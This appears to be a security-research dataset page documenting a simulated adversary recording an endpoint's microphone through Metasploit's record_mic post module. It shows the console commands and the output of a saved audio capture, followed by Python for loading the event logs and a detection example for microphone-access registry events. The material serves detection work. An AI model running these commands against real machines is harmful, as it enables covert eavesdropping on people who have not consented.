MSF Record Mic

Metadata

Contributors: Roberto Rodriguez @Cyb3rWard0g
Creation Date: 2020/06/09
Modification Date: 2020/06/09
Tactics: TA0009
Techniques: T1123
Tags: Microphone Access

Dataset Description

This dataset represents adversaries accessing the microphone of an endpoint.

Simulation Metadata

Tools

| type | Name | Module |
|------|------|--------|
| C2 | Metasploit | post |

Adversary View

msf5 exploit(multi/handler) > use post/multi/manage/record_mic
msf5 post(multi/manage/record_mic) > set SESSION 2
SESSION => 2
msf5 post(multi/manage/record_mic) > info

      Name: Multi Manage Record Microphone
    Module: post/multi/manage/record_mic
  Platform: Linux, OSX, Windows
      Arch: 
      Rank: Normal

Provided by:
  sinn3r <sinn3r@metasploit.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DURATION  5                no        Number of seconds to record
  SESSION   2                yes       The session to run this module on.

Description:
  This module will enable and record your target's microphone. For 
  non-Windows targets, please use Java meterpreter to be able to use 
  this feature.

msf5 post(multi/manage/record_mic) > run

[*] 172.18.39.6 - 20%...
[*] 172.18.39.6 - 40%...
[*] 172.18.39.6 - 60%...
[*] 172.18.39.6 - 80%...
[*] 172.18.39.6 - 100%...
[*] 172.18.39.6 - Audio size: (55169 bytes)
[+] 172.18.39.6 - Audio recording saved: /home/msf/.msf4/loot/20200610025201_default_172.18.39.6_172.18.39.6.audi_358712.wav
[*] Post module execution completed
msf5 post(multi/manage/record_mic) >

Explore Datasets

Download & Decompress Dataset

import requests
from zipfile import ZipFile
from io import BytesIO

# Download the zipped dataset and extract its first member (the JSON file)
url = 'https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/collection/host/msf_record_mic.zip'
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # stop here if the download failed
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File

import pandas as pd

# The dataset is JSON lines: one event record per line
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)

Access Security Events

df.groupby(['Channel']).size().sort_values(ascending=False)
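
Beyond counting events per channel, the following added example (not part of the original dataset page) shows one way to look for microphone access in records of this shape: it flags registry events that touch the Windows microphone consent store and recovers the recording application's path from the subkey name. The registry path, the field names (ObjectName, TargetObject, ProcessName, Image) and the sample records are assumptions constructed for illustration, and only the standard library is used so it runs without downloading the dataset.

```python
import json

# Windows 10 records per-application microphone use under this registry path
# (background knowledge, not stated on the page). Compared in lowercase.
MIC_CONSENT = "\\capabilityaccessmanager\\consentstore\\microphone\\nonpackaged"

# Registry events per channel: Security object access, Sysmon value set.
REGISTRY_EVENTS = {
    "Security": {4656, 4657, 4663},
    "Microsoft-Windows-Sysmon/Operational": {13},
}

# Constructed records; field names are assumed, not taken from the dataset.
SAMPLE_JSONL = r'''
{"Channel": "Security", "EventID": 4663, "ObjectName": "\\REGISTRY\\USER\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged\\C:#Windows#Temp#example.exe", "ProcessName": "C:\\Windows\\Temp\\example.exe"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 13, "TargetObject": "HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\ConsentStore\\microphone\\NonPackaged\\C:#Windows#Temp#example.exe\\LastUsedTimeStart", "Image": "C:\\Windows\\Temp\\example.exe"}
{"Channel": "Security", "EventID": 4663, "ObjectName": "\\REGISTRY\\MACHINE\\SOFTWARE\\Example", "ProcessName": "C:\\Windows\\regedit.exe"}
{"Channel": "Microsoft-Windows-Sysmon/Operational", "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe"}
{"Channel": "Security", "EventID": 46
'''


def mic_access_events(jsonl_text):
    """Return registry events that touch the microphone consent store."""
    hits = []
    for line in jsonl_text.splitlines():
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # blank or truncated line
        if event.get("EventID") not in REGISTRY_EVENTS.get(event.get("Channel"), ()):
            continue
        target = event.get("ObjectName") or event.get("TargetObject") or ""
        idx = target.lower().find(MIC_CONSENT)
        if idx == -1:
            continue
        # The subkey after NonPackaged is the recording binary's path, '#' for '\'.
        subkey = target[idx + len(MIC_CONSENT):].lstrip("\\").split("\\", 1)[0]
        hits.append({
            "EventID": event["EventID"],
            "Application": subkey.replace("#", "\\"),
            "Process": event.get("ProcessName") or event.get("Image"),
        })
    return hits


if __name__ == "__main__":
    for hit in mic_access_events(SAMPLE_JSONL):
        print(hit)
```

Whether the downloaded dataset contains these registry events depends on the audit and Sysmon configuration in place when it was collected, so check the channel counts above first.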